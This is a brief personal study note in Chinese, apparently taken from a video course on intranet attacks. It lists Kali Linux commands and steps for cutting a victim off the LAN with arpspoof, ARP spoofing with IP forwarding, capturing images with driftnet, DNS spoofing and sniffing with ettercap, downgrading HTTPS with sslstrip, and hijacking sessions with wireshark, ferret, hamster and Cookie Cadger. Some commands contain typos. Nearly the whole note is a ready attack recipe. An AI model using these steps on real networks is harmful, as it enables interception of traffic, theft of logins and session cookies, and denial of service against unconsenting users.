lan attack

内网视频学习笔记( ̄▽ ̄)~*

局域网断网攻击

虚拟机 kali linux
arpspoof -i 网卡 -t ip 网关
查别人的 ip fping-asg x.0/24
linux ifconfig windows ipcomfig

arp 欺骗

先输入 ech0 1>/proc/sys/net/ipv4/ip_forward 无回显
可用cat 看是否成功 cat/proc/sys/net/ipv4/ip_forward
再arpspoof …

driffnet 获取本机网卡图片

driffnet -i 网卡
会弹一个小窗口
可在/tmp内找到图片

http

ettercap dns欺骗 流量嗅探
先arp欺骗 再 ettercap-Tq-i eth0
(Tq 启动文本模式 q安静模式)

https

sslstrip 将https链接还原为http (缺点:证书错误)
首先设置 使用 vim esc+:q!不保存退出 esc+:wq保存退出
vim/etc/ettercap/etter.conf
光标移动到 linux 删除下两个# 设置完成
sslstrip -a -f -k

会话劫持

way1 先arp欺骗
wireshark 抓包 ferret重新生成抓包后文件 hamster重放流量
输入wireshark 为图形界面
抓包并保存为QAQ.pacp文件
再ferret -r QAQ.pacp
生成txt文件 将该文件复制到
cp hamster.txt /root/
输入 hamster 根据提示
修改浏览器代理设置
进入网址

way2
ferret -i eth0(网卡)
浏览器设置同上
再hamster (若有hamster文件存在需先删除)
进入网址同步获取

way3
cookie cadger
工具一键劫持